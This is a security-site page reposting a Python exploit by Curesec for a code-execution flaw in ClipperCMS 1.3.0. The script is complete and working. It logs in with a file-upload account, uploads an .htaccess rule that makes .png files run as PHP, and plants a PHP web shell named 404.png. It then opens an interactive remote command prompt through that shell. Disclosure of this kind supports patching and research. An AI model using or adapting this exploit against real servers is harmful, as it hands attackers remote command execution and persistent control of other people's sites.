首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ClipperCMS 1.3.0 - Code Execution Vulnerability
来源:crt@curesec.com 作者:curesec 发布时间:2015-11-17  
#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt@curesec.com
 
import sys
import re
import requests # requires requests lib
 
if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")
 
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
 
loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"
 
def login(requestSession, url, username, password):
    postData = {"ajax": "1", "username": username, "password": password}
    return requestSession.post(url, data = postData, headers = {"referer": url})
 
def getFullPath(requestSession, url):
    request = requestSession.get(url, headers = {"referer": url})
    if "You don't have enough privileges" in request.text:
        return "cant upload"
    fullPath = re.search("var current_path = '(.*)';", request.text)
    return fullPath.group(1)
 
def upload(requestSession, url, fileName, fileContent, postData):
    filesData = {"userfile[0]": (fileName, fileContent)}
    return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})
 
def workingShell(url, fullPath):
    return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")
 
def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")
 
requestSession = requests.session()
 
loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
    exit("ERROR: Incorrect username or password")
else:
    print("successful: login as " + username)
 
fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
    exit("ERROR: user does not have required privileges")
else:
    print("successful: user is allowed to use file manager. Full path: " + fullPath)
 
uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload .htaccess file")
else:
    print("successful: .htaccess upload")
 
uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload shell")
else:
    print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")
 
if workingShell(url + "404.png?x=", fullPath):
    print("successful: shell seems to be working")
else:
    exit("ERROR: shell does not seem to be working correctly")
 
runShell(url + "404.png?x=")
 
 
#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Idera Up.Time Monitoring Stati
·XCart 5.2.6 - Code Execution V
·Idera Up.Time Monitoring Stati
·foobar2000 1.3.9 - (.asx) Loca
·vBulletin 5.1.2 Unserialize Co
·TECO SG2 LAD Client 3.51 SEH O
·Sam Spade 1.14 - S-Lang Comman
·TECO JN5 L510-DriveLink 1.482
·TUDU 0.82 - Local Stack-Based
·Free WMA MP3 Converter 1.8 Buf
·TACK 1.07 - Local Stack-Based
·WordPress Users Ultra 1.5.50 U
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved